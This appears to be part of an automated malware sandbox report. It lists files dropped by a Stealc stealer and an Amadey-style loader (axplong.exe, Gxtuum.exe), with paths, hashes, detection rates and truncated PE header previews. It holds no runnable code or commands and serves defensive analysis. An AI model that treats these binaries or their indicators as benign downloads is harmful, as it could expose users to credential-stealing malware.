Preview:	A@2..3Y.....8p.!..L.[...`..b..f^..J....P@....;.:.."....g...Tz.....T%.R.G.....0$.....n.....r0....R-A..z.N..jK...y.....;.EWs.@b....{....Y9p.)J.....s ;..9.j.........X.K..\|...e..i...`.c..U.h..%...[..b.....n..:Y....M........W>H.....?..O.[......{...7.....C/.!0..\|[&....f.q......}..Q.....+-o.y./T...%..K...vl;4..z."...k:..2[.v.o..{..c5...%...:..kZU1.J?..TI...!...\3_..&L.[{..4..G>..;.%..'...6.q..2....V_.^.....R...g.......<..%.5.j..3.-.o.aj..............j.8aw.6_e}....Z".WLw"S...,....'..6...P.=..xckw}......b..K..h..ad....m{&h...;.o.yR..9.....Q..E.b.....2m..E.r.N..8.u.Q4.m..ht.ck.&f.g...$.....3by..B.V1#.G..y..IL.j......2...\..A..^..T.5....+...W=.Z.[.z....X`.&..z.h...B....\|xs..H&X..Nv..k.5.s.Z...:~9.V.M.PO&.@..m....P.K......".Ju..?.._:%qp.ON..q.....c.AN$N..-MB.q..-.hz.+..O.B.+<~...f..V..5.C"EY..=D..\|.....;.e.\|.g.0.^i..f.._e:...0/.....'.[.........A.1.RY.6}..l.Kf....$.7.N...[ml.W......[.$...p..[H>.+....}.H.....\H2[.'.p......./..z.@...J....-....

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dc753b12e1.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YJJA1RDG0PY87AD1W2WB98M4U9.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2985984
Entropy (8bit):	6.497653780586252
Encrypted:	false
SSDEEP:	49152:G8ryZig/pnhI8DRS3Shk2zpIP5vQ0Ff4RIyB16R:F+sg/pnhIiRSC9KFfds6
MD5:	B00D133C7ED8F6D1FB0C04A1509A4AC8
SHA1:	EB2EDD020A4ED9CEC13519570FC1865104002692
SHA-256:	016626A8D042B0C82A134107E5CC705CB7E7626FCFEC16984242D8F2721C158F
SHA-512:	27A782038FA49E9DF868B60E816A881622C2E74F122DDE489C109220AC3081AF4ED975E815E4149230291EC34C91FC92A68EC02EDB939D7D6716D4608F441B25
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............0...........@...........................0..........@.................................T...h................................................................................................................... . .........~..................@....rsrc ............................@....idata ............................@...mnwtlczj..........................@...cxnprjgo......0......j-.............@....taggant.0....0.."...n-.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2140160
Entropy (8bit):	7.958134036073586
Encrypted:	false
SSDEEP:	49152:7yaQhWLVFDJik5s432FpEqi6kgplfhVtzemFD1xN12:uaioVlJiAs4Mpoc3pVjL
MD5:	86F793173F02F6C3E82962700F9D0393
SHA1:	6F31095841204037EF18DB8DC314037CD41EEA6E
SHA-256:	B81182E20F0C54C1B903045A3D0BF63F58942EA66E70C4A9516C8338ECDAE03C
SHA-512:	94CC0B09D70DDEC5BF74EEE5BA89A06A90610C7C949A76A08E3464A9082DB180365B094E81DE3705157584F138B803B0EB61102CD5CF435186D16EAB5CCE84B2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g......................,.......r...........@...........................r.....8g!...@.................................P...d................................................................................................................... . .p.......v..................@....rsrc ............................@....idata ............................@... ..).........................@...mmyokrrt......X.....................@...cvfsshmr......r....... .............@....taggant.0....r..".... .............@...........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\splwow64[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1224767
Entropy (8bit):	7.973762647331916
Encrypted:	false
SSDEEP:	24576:G/e3qkBTWU2YmUQEg/IcuH+PtJ1NFDk6S2JPxeRcMZYj2I:wsgUzg/TuelJHDDTeVuJ
MD5:	5D97C2475C8A4D52E140EF4650D1028B
SHA1:	DA20D0A43D6F8DB44FF8212875A7E0F7BB223223
SHA-256:	F34DD7EC6030B1879D60FAA8705FA1668ADC210DDD52BCB2B0C2406606C5BCCF
SHA-512:	22C684B21D0A9EB2EAA47329832E8EE64B003CFB3A9A5D8B719445A8532B18AAD913F84025A27C95296EBEB34920FA62D64F28145CCFA3AA7D82BA95381924EE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n...N...B...8............@..................................P....@.................................4........@.................h(......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc........@......................@..@.reloc..2............2..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\stail[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5520596
Entropy (8bit):	7.999043649227224
Encrypted:	true
SSDEEP:	98304:MW5j/7pHsZpdItCe3f2Ic0srZCngwwoyR3BDr2ZWpz8UuAxKPtsqJ:/5j/lMZpdyCk1sVwkTR3MMz8UuAsFsU
MD5:	DCF45A3386D6E8A1EFA6B2040125C3CA
SHA1:	6A7E356507BD3777B6CD9677627E31CE6BE7D9CF
SHA-256:	E709B26315714057CE041823F8A63F38064790A4A2AF8FA00A9B63EA19D82329
SHA-512:	C32ECDC9EC8AAAB6C1FD12EFF22E83B74F9300E66D9CDFCE1F1CF182A944E54A9F4E1A3EE6508AADC7927691760FAA89591DA6BA8B4298E5EB5CD513BDAD6AE8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD1234[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	660480
Entropy (8bit):	7.64329230449762
Encrypted:	false
SSDEEP:	12288:UuM8OZLrEIC6jejDTN2kNhqqitQ+jHKVkdvXPg9O/1ACWFtIC5NcDU:dI4I50fsYqqitSkxPg41Xgtp5WDU
MD5:	BDF3C509A0751D1697BA1B1B294FD579
SHA1:	3A3457E5A8B41ED6F42B3197CFF53C8EC50B4DB2
SHA-256:	D3948AE31C42FCBA5D9199E758D145FF74DAD978C80179AFB3148604C254BE6D
SHA-512:	AA81CCBAE9F622531003F1737D22872AE909B28359DFB94813A39D74BDE757141D7543681793102A1DC3DCAECEA27CFFD0363DE8BBB48434FCF8B6DAFEF320B3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...q. g..........................................@.......................................@.....................................(............................0... ..........................`u......x...................P............................text............................... ..`.rdata..............................@..@.data....1..........................@....00cfg..............................@..@.tls......... ......................@....reloc... ...0..."..................@..B.call........`..........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Offnewhere[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	439296
Entropy (8bit):	6.486801995408641
Encrypted:	false
SSDEEP:	12288:H/RCVy1xtsmUQTXNujba1fM0HRm77vRMmg:ntsouyBM+RmnRLg
MD5:	C07E06E76DE584BCDDD59073A4161DBB
SHA1:	08954AC6F6CF51FD5D9D034060A9AE25A8448971
SHA-256:	CF67A50598EE170E0D8596F4E22F79CF70E1283B013C3E33E36094E1905BA8D9
SHA-512:	E92C9FCD0448591738DAEDB19E8225FF05DA588B48D1F15479EC8AF62ACD3EA52B5D4BA3E3B0675C2AA1705185F5523DCAFDF14137C6E2984588069A2E05309F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........BS..,...,...,.../...,...).#.,..(...,../...,..)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,.........PE..L.....%g..........................................@..........................0............@.................................0E...................................E......8...............................@...............<............................text............................... ..`.rdata..@H.......J..................@..@.data....m...`...,...@..............@....rsrc................l..............@..@.reloc...E.......F...n..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\hhnjqu9y[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3608064
Entropy (8bit):	7.9585873900914725
Encrypted:	false
SSDEEP:	98304:MHKnK7qkC+8TMGHgWnvLBQ0YXpS3KZFc6LUARABDgAj:MqKYx9zu0YpSaZFcJA6BDga
MD5:	B45668E08C03024F2432FF332C319131
SHA1:	4BEF9109EAEACE4107C47858EEF2D9D3487E45F0
SHA-256:	4B5A876B1C230B28C0862D5F8158B3657016709855BF3329D8FEA6CADA3ADBFE
SHA-512:	538C8471FC0313E68885D4D09140EC3E3374AF3464AF626195B6387A67B9BAE9C3C9FD369D9DC7965DECC182D13E8BBF95B4CF96B5FFC78AF5D7904D59325BBC
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q.................P..0...B.......-g.. ...`....@.. ...............................(7...@.................................:...P.....................6............................................................................................. .@... ...................... ..` >?...`...:..................@..@ .............(..............@..B.idata... ...........*..............@....rsrc................,..............@..@.themida. N..........8..............`....boot..... .. g... ..8..............`..`........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\JavUmar[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	6750208
Entropy (8bit):	6.3036586837050015
Encrypted:	false
SSDEEP:	49152:k/+gj39KwBibw676WqeqKPn0Ppgq8LeWrqLGd5Qbbie3hkTaffK4bXDxQRzK1sp3:k/r37ibuWzxPn0PitLLCG8bbyCKsx
MD5:	331990A29AFA36193295A7B63EA4E712
SHA1:	5BD7935DCCB305CAD7C1F2026B8F6629EB2E61E4
SHA-256:	80C8797268CB88F5BEF1791CCC88B62288763A27528709886E55175B9BD94487
SHA-512:	B7CE03289EC5339FCBE116538734ADA73763FA18A42B3C95F63106BD0F85DC60111FC555EB6B5D6950D5B1FDD65F26CD4F5450BF82D330059D8184FAFD52B4F2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y=$g...............(..F...f..2............F...@...........................g.....q.g...@... ...............................d.P(...........................`d.............................p.c.......................d.p............................text.....F.......F.................`..`.data....>....F..@....F.............@....rdata..hk...0O..l....O.............@..@.eh_framP/....c..0....c.............@..@.bss....`1....c..........................idata..P(....d..*....c.............@....CRT....0....@d.......c.............@....tls.........Pd.......c.............@....reloc.......`d.......c.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\RDX123456[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334848
Entropy (8bit):	6.761223756666625
Encrypted:	false
SSDEEP:	6144:+tWC7xvtddofKKrybbuMY88Jc/oZ3ipoOvYcOCL7E6tt7thlp4:+RZtddofKKrzHPJ3ii0bL7E6t7Z2
MD5:	FBA8F56206955304B2A6207D9F5E8032
SHA1:	F84CBCC3E34F4D2C8FEA97C2562F937E1E20FE28
SHA-256:	11227EAD147B4154C7BD21B75D7F130B498C9AD9B520CA1814C5D6A688C89B1B
SHA-512:	56E3A0823A7ABE08E1C9918D8FA32C574208B462B423AB6BDE03345C654B75785FDC3180580C0D55280644B3A9574983E925F2125C2D340CF5E96B98237E99FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.................D........................@.......................................@.................................R....................................K...................................................................................text....B.......D.................. ..`.rdata..'%...`...&...H..............@..@.data............b...n..............@....reloc...K.......L..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\new_v8[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5952512
Entropy (8bit):	7.874022549731662
Encrypted:	false
SSDEEP:	98304:S1DARPEaQuozISL3R0yFmGPwnvYw9iyiqWAWjuQCmtGlSliMhabgxEA:oFzuCII9CniytWjuQTtASl9hasb
MD5:	5009B1EF6619ECA039925510D4FD51A1
SHA1:	22626AA57E21291A995615F9F6BBA083D8706764
SHA-256:	FBC8C32BF799A005C57540A2E85DD3662ED5795A55F11495F0BA569BBB09DF59
SHA-512:	2B5BBD9449BE00588058966DB487C0ADFAC764827A6691F6A9FC6C3A770A93BDA11C732D2EB2A3C660697CBC69B1C71A2BF76D2957F65CD2599FB28098B24F14
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............K...........@..........................P........[...@...................................>......`.......................P..\.................................................... 0..............................text....I.......................... ..`.rdata..=%...`......................@..@.data...............................@....vmp.+........................... ..`.vmp.+d.... 0.....................@....vmp.+P.X..00...X................. ..`.reloc..\....P......."X.............@..@.rsrc........`.......X.............@..@........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2981888
Entropy (8bit):	6.504787289934123
Encrypted:	false
SSDEEP:	49152:GuWF3x9XSZXGt+4sDzDYwXsbiJIamSYHk39kB4:GjF3XSZXGt+fDzDr8beIaRYGkB
MD5:	74CE0C33923116EB0668BA3302893EF9
SHA1:	F69C905E2976B0C107649392072976E9E3A0E445
SHA-256:	4F14A84B40DBA7B3B4CFDF6EEB1FF46933C092B69F47E9DBCA4CE20110C8A722
SHA-512:	6FBD66FECCCC6D92530E6A65211C9DBAB597780FC80AFAA57F5B37FE0B3CBAD7A12C590DF2127360B2A4F624F83E6B193D4E628FF45718FE3177FC02A1193B0E
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............0...........@...........................0.....N.-...@.................................T...h.......@........................................................................................................... . .........~..................@....rsrc...@...........................@....idata ............................@...bujgvxmj..........................@...wxhexoyo......0......X-.............@....taggant.0....0.."...^-.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	526848
Entropy (8bit):	7.806472978332927
Encrypted:	false
SSDEEP:	12288:NL07gVkGXreL4LV8wdljMagCkqZBtzPmmhwAoXC+YF:Nw7g6GXrnFkm1PmmBqC+YF
MD5:	26D8D52BAC8F4615861F39E118EFA28D
SHA1:	EFD5A7CCD128FFE280AF75EC8B3E465C989D9E35
SHA-256:	8521A1F4D523A2A9E7F8DDF01147E65E7F3FF54B268E9B40F91E07DC01FA148F
SHA-512:	1911A21D654E317FBA50308007BB9D56FBA2C19A545EF6DFAADE17821B0F8FC48AA041C8A4A0339BEE61CBD429852D561985E27C574ECED716B2E937AFA18733
Malicious:	true
Reputation:	unknown
